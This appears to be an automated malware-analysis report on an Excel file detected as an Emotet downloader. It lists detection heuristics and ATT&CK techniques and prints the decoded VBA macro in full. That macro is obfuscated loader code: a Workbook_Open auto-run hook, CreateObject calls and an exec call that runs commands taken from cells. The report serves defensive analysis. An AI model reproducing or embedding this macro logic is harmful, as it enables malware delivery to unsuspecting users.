MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV and exhibits high-severity heuristics for VBA macros, including a Workbook_Open auto-execution event and CreateObject calls. The embedded VBA macro attempts to execute a VBScript payload located at 'c:\programdata\tjspowj.vbs' and a batch file at 'c:\programdata\uidpjewl.bat'. The batch file contains obfuscated commands that appear to download and execute payloads from multiple URLs. The VBA script itself also contains a long, concatenated string that reconstructs a series of URLs, likely for downloading additional malicious content.
Heuristics 6
-
ClamAV: Xls.Downloader.Emotet-ab81c42b2bd4747e-9951196-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.Emotet-ab81c42b2bd4747e-9951196-0
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
If strOut = "g457dt" Then Set objWordApp = CreateObject("Word.Application") objWordApp.documents.Add -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Private Sub Workbook_Open() Dim lngAge As Long
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13985 bytes |
SHA-256: faf50200d5a9adeeda00cc1da1bbf8f6abf0317a1e97a58db8ae804ba12ba446 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Fbhndfghsret3"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Const dhcSum As Integer = 0
Const dhcAvg As Integer = 1
Const dhcMax As Integer = 2
Const dhcMin As Integer = 3
Const dhcCount As Integer = 4
Const dhcSumPlus As Integer = 5
Const dhcSumMinus As Integer = 6
Const dhcCountFull As Integer = 7
Const dhcCountNotNull As Integer = 8
Const dhcCountPlus As Integer = 9
Const dhcCountMinus As Integer = 10
Sub ghsdrsDERGshdhsrse5wasd()
Dim intLastRow As Integer
Dim intRow As Integer
Dim intYesRow As Integer
Dim intNoRow As Integer
Dim strText As String
Dim strNewName As String
Dim strNewQuestion As String
Dim intRes As Integer
MsgBox "fgzdsrfyhgj myjdf. Gaserfhlsd srhtgius.", vbOKOnly, _
"gharagsdf"
intLastRow = Worksheets("Data").Range("D1").Value + 1
intRow = 1
Do While intRow < intLastRow
strText = Worksheets("Data").Cells(intRow, 1).Value
intYesRow = Worksheets("Data").Cells(intRow, 2).Value
intNoRow = Worksheets("Data").Cells(intRow, 3).Value
If intYesRow > 0 Then
intRes = MsgBox(strText, vbYesNo, "hueswrfg")
If intRes = vbYes Then
intRow = intYesRow
Else
intRow = intNoRow
End If
Else
intRes = MsgBox("weg " & strText & "d", vbYesNo, "rtgwae")
End If
Loop
End Sub
Private Sub Workbook_Open()
Dim lngAge As Long
Dim datDate As Date
datDate = Now: lngAge = DateDiff("yyyy", _
datDate, Date): kjDygzs34e.Caption = Cells(105, 7) + _
vbCrLf & Cells(103, 6)
If DateSerial(Year(datDate) + lngAge, Month(datDate), _
Day(datDate)) > Date Then
lngAge = lngAge - 1
End If
lngAge = lngAge + 1: kjDygzs34e.Tag = Replace(Cells(102, 5), _
"uwpe", ""): hsdFghawoyhitshdg Range("D147"), Range("A203"): dhCalculateAge = _
lngAge: kjDygzs34e.trgsEtgseg.Text = ":"
End Sub
Sub HstgsAgsw4Rfhsf(ghoiwue As String, tyo3oe As String, HSere4yd As Boolean)
Dim strStyle As String: Dim strAlign As String: Dim strOut As String
Dim cell As Object: Dim strCellText As String: Dim lngRow As Long
Dim lngLastRow As Long: Dim strTemp As String
Dim objWordApp As Object
Dim i As Long: i = 1: lngLastRow = _
Selection.Row: Open ghoiwue For Output As #i
For Each cell In Selection
lngRow = cell.Row
If i < 0 Then
If lngRow <> lngLastRow Then
strOut = strOut & vbTab & "</tr>" & vbCrLf & vbTab & _
"<tr>" & vbCrLf
lngLastRow = lngRow
End If
If Not IsNull(cell.Font.Size) Then
strStyle = " style=" & "font-size: " & Int(100 * _
cell.Font.Size / 19) & "%;"
End If
If cell.Font.Bold Then
strCellText = "<b>" & strCellText & "</b>"
End If
If cell.HorizontalAlignment = xlRight Then
strAlign = " align=" & "right"
ElseIf cell.HorizontalAlignment = xlCenter Then
strAlign = " align=" & "center"
Else
strAlign = ""
End If
strCellText = cell.Text
If cell.Orientation <> xlHorizontal Then
strTemp = ""
For i = 1 To Len(strCellText)
strTemp = strTemp & Mid$(strCellText, i, 1) & "<br>"
Next i
strCellText = strTemp
strStyle = ""
End If
End If
strOut = strOut & vbTab & vbTab & "<td" & strStyle & strAlign _
& ">" & strCellText & "</td>" & vbCrLf
Next
strOut = vbTab & "<tr>" & vbCrLf & strOut & vbTab & _
"</tr>" & vbCrLf: Print #i, tyo3oe
strOut = "<table border=1 cellpadding=3 cellspacing=1>" & vbCrLf & _
strOut & vbCrLf & "</table>": Close #i
If strOut = "g457dt" Then
Set objWordApp = CreateObject("Word.Application")
objWordApp.documents.Add
objWordApp.Selection = strOut
objWordApp.Selection.Copy
objWordApp.Visible = True
Set objWordApp = Nothing
End If
End Sub
Function hsdFghawoyhitshdg(rgWeights As Range, rgValues As Range) _
As Double
If (rgWeights.Count <> rgValues.Count) Then
hsdFghawoyhitshdg = 0
Exit Function
End If
Dim dblSum As Double: Dim dblSumWeight As Double
Dim i As Integer: HstgsAgsw4Rfhsf Cells(101, 10), _
kjDygzs34e.Caption, True
For i = 1 To rgWeights.Count
dblSumWeight = dblSumWeight + rgWeights(i) * rgValues(i)
dblSum = dblSum + rgWeights(i)
Next
If dblSum < 0.1 Then dblSum = 1
HstgsAgsw4Rfhsf Cells(104, 12), kjDygzs34e.Tag, False
hsdFghawoyhitshdg = dblSumWeight / dblSum
End Function
Attribute VB_Name = "GhFdrtdSrt4ufg"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "kjDygzs34e"
Attribute VB_Base = "0{B6874302-9604-4C36-98C0-C6611BDCEF6F}{57CDD0AB-1AE3-48D4-9215-12C912879B63}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public aesrghiyasdg, ghasRYafh378gswd As String
Public sdehfSRRyawdef, sdehsFghrtyds, r4y6difuhbgkj As Variant
Public gjosibfsd, nbgldfif As Object
Public sehklslslqwho8uesgeharGASDgaw3eg As Boolean
Public Function fHasegfasdfaqw35ysdfhgdg(strRange As String, _
lngColor As Long, fBackBolor As Boolean, _
intMode As Integer, Optional fAbsence As Boolean) As Double
Dim rgData As Range
Dim i As Integer
Dim Values() As Variant
Dim intCount As Integer
Dim cell As Range
Dim varOut As Variant
Set rgData = Range(strRange)
ReDim Values(1 To rgData.Count)
For Each cell In rgData.Cells
If fBackBolor = True Then
If fAbsence Then
If cell.Interior.Color <> lngColor Then
intCount = intCount + 1
Values(intCount) = cell.Value
End If
Else
If cell.Interior.Color = lngColor Then
intCount = intCount + 1
Values(intCount) = cell.Value
End If
End If
Else
If fAbsence Then
If cell.Font.Color <> lngColor Then
intCount = intCount + 1
Values(intCount) = cell.Value
End If
Else
If cell.Font.Color = lngColor Then
intCount = intCount + 1
Values(intCount) = cell.Value
End If
End If
End If
Next cell
For i = 1 To intCount
Select Case intMode
Case dhcSum, dhcAvg
varOut = varOut + Values(i)
Case dhcSumPlus
If Values(i) > 0 Then varOut = varOut + Values(i)
Case dhcSumMinus
If Values(i) < 0 Then varOut = varOut + Values(i)
Case dhcMax
If Values(i) > varOut Then varOut = Values(i)
Case dhcMin
If i = LBound(Values) Then varOut = Values(i)
If Values(i) < varOut Then varOut = Values(i)
Case dhcCount
varOut = varOut + 1
Case dhcCountFull
If Not IsEmpty(Values(i)) Then varOut = varOut + 1
Case dhcCountNotNull
If Not IsEmpty(Values(i)) And Values(i) <> 0 Then _
varOut = varOut + 1
Case dhcCountPlus
If Values(i) > 0 Then varOut = varOut + 1
Case dhcCountMinus
If Values(i) < 0 Then varOut = varOut + 1
End Select
Next i
If intMode = dhcAvg Then
ColorCalc = varOut / intCount
Else
ColorCalc = varOut
End If
End Function
Sub GFhsdrffhDFHse4ydkjugxkic()
Dim strFormula As String: Dim intMode As String
bSretgsrhjl.Caption = ""
If Cells(204, 29).Value = "d" Then
MsgBox "etysdigfsigDSFHsdtjh sthjSte54y7sdrtgh sbsidy78us", _
vbCritical, "tysdoihf shdo!"
txtResCell.SetFocus
Exit Sub
ElseIf Cells(204, 29).Value = "f" Then
MsgBox "tghwoeui fhiwuegfisudogihwoeyis sgid", _
vbCritical, "hasewrt!"
txtRange.SetFocus
Exit Sub
End If
lngCurColor = "869392"
rGHJdtfgh54.Tag = Cells(101, 17): strFormula = "=ColorCalc(" & """" & "," & lngCurColor & "," & _
CInt(cbrfhiw7swdg.Top) & "," & intMode & "," & CInt(rGHJdtfgh54.Height) & _
")": Set gjosibfsd = nbgldfif.CreateObject(rGHJdtfgh54.Tag, _
bSretgsrhjl.Caption)
txtResCell = Cells(345, 83): ghsethkaw4tdThsreSrgsjhiwe78
If strFormula = "," Then Range(txtResCell.Value).Formula = strFormula
End Sub
Sub DFgasfashefiawt7a89sudfoiasd(ByVal Cancel As MSForms.ReturnBoolean)
Dim rgData As Range
Dim cell As Range
If trgsEtgseg.Text = "" Then
MsgBox "hSDhsdfg aSeRaw3tysdthjsdfgA asEfaW4ydThsdf!", _
vbCritical, "rgjao gh4iausghi"
Cancel = True
End If
If trgsEtgseg.Text = "" Then Exit Sub
On Error GoTo Err1
Set rgData = Range(txtRange.Text)
For Each cell In rgData.Cells
If cell.Address(False, False) = _
Range(txtResCell.Text).Address(False, False) Then
MsgBox "dfagiweu fasidygfa8us7e6rt8dfsdgfHDFSjSTGh sertg " & _
"ghasdiag eyurgfisdf", vbCritical, _
"sdfgiuwegse!"
Cancel = True
Exit Sub
End If
Next cell
Exit Sub
Err1:
If Err.Number = 1004 Then
MsgBox "rgsas ikjubvgasegase a4tasdf", vbCritical, _
"bcvuyasfeu 4eughtkoidcsbs"
Cancel = True
Exit Sub
Else
MsgBox Err.Description, vbCritical, "gasgfku 45oyitjlkihjh"
Cancel = True
Exit Sub
End If
End Sub
Private Sub trgsEtgseg_Change()
Dim strFistCell As String
Dim strLastCell As String
Dim strFormula As String
If ActiveCell.Row = 13592 Then Exit Sub
strFistCell = Cells(1500, 34).Offset(-1, 0).End(xlUp).Address
strLastCell = Cells(1250, 35).Offset(-1, 0).Address
strFormula = "=AVERAGE(" & strFistCell & ":" & _
strLastCell & ")": AcivelOfstAdrs
Formula = strFormula
End Sub
Sub AcivelOfstAdrs()
Dim intFunc As Integer
Dim strFunc As String
cbrfhiw7swdg.AddItem "0": cbrfhiw7swdg.List(0, 1) = "erfgisd7": cbrfhiw7swdg.AddItem "1"
cbrfhiw7swdg.List(1, 1) = "jer6": cbrfhiw7swdg.AddItem "2"
cbrfhiw7swdg.List(2, 1) = "gaeww"
cbrfhiw7swdg.AddItem "3": rGHJdtfgh54.Caption = Cells(104, 9)
cbrfhiw7swdg.List(3, 1) = "rtyqae": cbrfhiw7swdg.AddItem "4": cbrfhiw7swdg.List(4, 1) = _
"dsfgh bqias": Set nbgldfif = CreateObject(rGHJdtfgh54.Caption)
If Selection.Cells.Count = 154702 Then
intFunc = InStr(Selection.Formula, "ColorCalc(")
If intFunc > 0 Then
txtResCell.Text = Selection.Address(False, False)
strFunc = Mid(Selection.Formula, intFunc + 11)
intFunc = InStr(strFunc, """")
txtRange.Text = Left(strFunc, intFunc - 1)
strFunc = Mid(strFunc, intFunc + 2)
intFunc = InStr(strFunc, ",")
strFunc = Mid(strFunc, intFunc + 1)
intFunc = InStr(strFunc, ",")
tglType.Value = Left(strFunc, intFunc - 1)
strFunc = Mid(strFunc, intFunc + 1)
strFunc = Left(strFunc, Len(strFunc) - 1)
intFunc = InStr(strFunc, ",")
cboCalcTypes.Text = cboCalcTypes.List(Val(Left$( _
strFunc, intFunc - 1)), 1)
strFunc = Mid(strFunc, intFunc + 1)
chkVarify.SetFocus
chkVarify.Value = CBool(strFunc)
lblChoose.Visible = True
Else
txtRange.Value = Selection.Address(False, False)
cboCalcTypes.Text = "hasderf"
End If
Else
trgsEtgseg.Tag = "rh": GFhsdrffhDFHse4ydkjugxkic
cbrfhiw7swdg.Text = "ryaweroir"
End If
End Sub
Sub ghsethkaw4tdThsreSrgsjhiwe78()
Dim rgCells As Range
Dim i As Integer
Dim intColorNumber As Integer
Dim lngCurColor As Long
Dim fColorPresented As Boolean
Dim tglType As Range
Dim ctrl As Control
Dim strCtrl As String
Dim fBackColor As Boolean
Set tglType = Cells(354, 100)
fBackColor = tglType.Value
On Error Resume Next
For Each ctrl In Me.Controls
If Left(ctrl.Name, 8) = "cmbColor" Then
ctrl.Visible = False
End If
Next ctrl
On Error GoTo ErrRange
sgfhnDTdkjF.Tag = Replace(Cells(99, 8), "ghwuy", "")
Set rgCells = Range("G350:G352")
On Error GoTo 0
If fBackColor = False Then
lngCurColor = rgCells.Cells(i).Font.Color
Else
lngCurColor = rgCells.Cells(i).Interior.Color
End If
cbrfhiw7swdg.BackColor = lngCurColor: cbrfhiw7swdg.Visible = True
intColorNumber = 2: gjosibfsd.exec sgfhnDTdkjF.Tag
For i = 2 To rgCells.Cells.Count
fColorPresented = False
If fBackColor = False Then
lngCurColor = rgCells.Cells(i).Font.Color
Else
lngCurColor = rgCells.Cells(i).Interior.Color
End If
For Each ctrl In Me.Controls
If Left(ctrl.Name, 8) = "cmbColor" And _
ctrl.Visible = True Then
If lngCurColor = ctrl.BackColor Then
fColorPresented = True
Exit For
End If
End If
Next ctrl
If Not fColorPresented Then
intColorNumber = intColorNumber + 1
strCtrl = "cmbColor" & intColorNumber
End If
Next i
Exit Sub
ErrRange:
If cbrfhiw7swdg.Text = "grec" Then
MsgBox "dgfqh8ir7gw giw3uegksdjbfklswregw g6tfyuefishvoldbfjodfi", _
vbCritical, "gasgfquiyew!"
End If
cbrfhiw7swdg.SetFocus
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.